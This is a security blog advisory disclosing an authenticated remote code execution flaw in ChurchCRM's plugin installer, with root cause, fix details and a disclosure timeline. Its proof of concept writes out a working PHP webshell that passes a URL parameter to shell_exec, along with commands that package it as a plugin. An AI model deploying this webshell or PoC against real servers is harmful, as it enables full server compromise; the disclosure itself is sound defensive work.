security research
iltosec
← back to blog
Rce Vulnerability Research Rce

CVE-2026-58409 : Authenticated Remote Code Execution (RCE)

Summary

A critical vulnerability was identified in ChurchCRM's plugin installation mechanism that allows an authenticated administrator to achieve full Remote Code Execution (RCE) on the underlying server. The file extension validation logic used for plugin ZIP archives explicitly includes .php in its allowed extensions list, while the dangerous extensions denylist fails to block standard PHP files. As a result, any PHP file placed inside the archive is extracted directly under the web root and becomes immediately executable via HTTP without the plugin even needing to be "enabled" through the application UI.

CVSS Score: CVE-2026-58409 | CVSS Score: Critical | Advisory: GHSA-37mf-vq43-5qp9 | Author: iltosec


Vulnerability Details

Root Cause

File: ChurchCRM/Plugin/PluginInstaller.php
Endpoint: POST /plugins/api/plugins/install-url
Required Privilege: Authenticated Administrator (Session or API Key)

The root cause lies in insufficient file validation logic during plugin archive extraction:

image

Destination: /var/www/html/churchcrm/plugins/community/{pluginId}/

image

image

Affected Files


Proof of Concept

Step 1: Build the malicious plugin archive:

PLUGIN_ID="pentest-shell"
mkdir -p /tmp/$PLUGIN_ID/src

Mandatory plugin manifest
/tmp/$PLUGIN_ID/plugin.json:

{
    "id": "pentest-shell",
    "name": "Pentest Shell",
    "version": "1.0.0",
    "type": "community",
    "description": "PoC RCE"
}

PHP webshell — will be served directly by Apache
/tmp/$PLUGIN_ID/shell.php:

<?php
if (isset($_GET['cmd'])) {
    echo '<pre>' . shell_exec($_GET['cmd'] . ' 2>&1') . '</pre>';
}
cd /tmp
zip -r pentest-shell.zip $PLUGIN_ID/
Compute the SHA-256 the API requires
sha256sum pentest-shell.zip

Step 2: Host the ZIP over HTTPS and install:

image

Step 3: Execute arbitrary OS commands:

image
image


Impact

Successful exploitation results in full Remote Code Execution on the server in the context of the www-data user. From there, an attacker can:

Although triggering this vulnerability requires an authenticated administrator account, its impact far exceeds that privilege level: a constrained admin role within the application panel is converted into unrestricted OS-level command execution on the server.


Fix

This issue was addressed in ChurchCRM 7.4.0 (released June 18, 2026) through the following changes:

1. Dangerous Extension Blocklist Enforced on Extraction

The plugin installer now explicitly blocks server-side executable file extensions (including .php, .phar, .php5, .phtml, and others) from being extracted from plugin archives. Any plugin ZIP containing these extensions is rejected at install time.

2. Plugin Approval and Vetting Process Introduced

ChurchCRM has established a plugin vetting process for community plugins. Plugins submitted to the official plugin registry are reviewed before being listed. Administrators are encouraged to install only plugins from the official ChurchCRM plugin registry or from sources they explicitly trust.

3. Defense-in-Depth Context

Plugin installation remains a privileged, administrator-only operation — equivalent to installing a WordPress plugin or Joomla extension. The architectural model intentionally grants administrators server-level capability. The 7.4.0 hardening raises the bar against supply-chain and social-engineering attacks targeting admin accounts, while the new vetting process reduces the risk of malicious plugins reaching the official registry.

Administrators running ChurchCRM ≤ 7.3.3 are strongly encouraged to upgrade to 7.4.0 immediately.


Disclosure Timeline

Date Event
2026-05-18 Vulnerability reported via GitHub Security Advisory
2026-06-18 Vendor acknowledged
2026-06-18 ChurchCRM 7.4.0 released (includes fix)
2026-06-18 Advisory published

References

found this useful?
share on x ↗
related posts